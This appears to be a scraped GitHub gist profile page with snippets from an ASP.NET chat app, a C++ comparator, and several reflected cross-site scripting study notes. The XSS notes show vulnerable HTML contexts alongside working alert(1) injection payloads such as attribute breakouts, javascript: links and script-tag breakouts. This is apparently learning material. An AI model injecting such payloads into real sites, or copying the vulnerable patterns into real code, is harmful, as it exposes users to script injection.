Skip to content

Instantly share code, notes, and snippets.

View FernandoZhuang's full-sized avatar
🎯
Focusing

0xshare FernandoZhuang

🎯
Focusing
View GitHub Profile
public ActionResult Register(){
string user_name = Request.Form["regname"];
string user_pwd = Request.Form["regpass"];
string user_repwd = Request.Form["reregpass"];
if (user_name.Trim() == "" || user_pwd.Trim() == "")
{
return Redirect("/");
}
if(user_pwd != user_repwd)
@FernandoZhuang
FernandoZhuang / Conversation.cs
Created April 29, 2018 03:44
Webchat: Conversation Model
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
namespace ChildChat.Models
{
public class Conversation
{
public Conversation()
@FernandoZhuang
FernandoZhuang / ChatContex.cs
Created April 29, 2018 03:46
WebChat: MVC Context
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Data.Entity;
namespace ChildChat.Models
{
public class ChatContext:DbContext
{
<!--Vulnerbility注入点 <label><h4> </h4></label> -->
<!--input输入 alert(1) -->
<label><h4>alert(1)</h4></label>
@FernandoZhuang
FernandoZhuang / XssTag标签基础弹框.html
Created June 13, 2018 14:23
XssReflectedCrossSiteScript
<!--Vulnerbility注入点:<label><h4><input type="text" name="test" value="1"> -->
<!--Inject输入: 1" onfocus="alert(1)" autofocus="true" -->
<label><h4><input type="text" name="test" value="1" onfocus="alert(1)" autofocus="true"></h4></label>
<!--Vulnerbility漏洞: <label><h4><a href="javascript:2333\" onfocus=\"alert(1)\" autofocus=\"true">不能闭合引号</a></h4></label> -->
<!--Injection输入:alert(1)-->
<label><h4><a href="javascript:alert(1)">不能闭合引号</a></h4></label>
<!--Vulnerbility注入点: <label><h4><input type="text" name="test" value="" 2333" > </h4></label> -->
<!--Inject输入: onfocus="alert(1)" autofocus="true" -->
<label><h4><input type="text" name="test" value="" onfocus="alert(1)" autofocus="true" > </h4></label>
@FernandoZhuang
FernandoZhuang / XssJs基础弹框.html
Created June 14, 2018 06:07
XssRefkectedCrossSite
<!--Vulnerbility注入点:
<label><h4>
<script type="text/javascript">
var you = 'iloveyou';
document.write('2333''+','+you);
</script>
</h4></label>
-->
<!--Inject输入: 233');alert(1);//'+','+you); -->
<label><h4>
<!--Vulnerbility注入点: 输入的是2333"alert(1)
<label><h4 id="twoH4">
<script type="text/javascript">
var two = document.getElementById('twoH4');
var two_value = "2333alert(1)";
two.innerHTML=two_value;
</script>
</h4></label>
-->
<!--Inject输入: </script> <script>alert(1)</script>-->
@FernandoZhuang
FernandoZhuang / StringCmp.cpp
Created January 8, 2019 03:35
Powerful Cmp:字符串拼接,构成最小的数
#include <algorithm>
bool Cmp(string A, string B){
return A+B<B+A;
}
int main(){
……
sort(str,str+len,Cmp);
……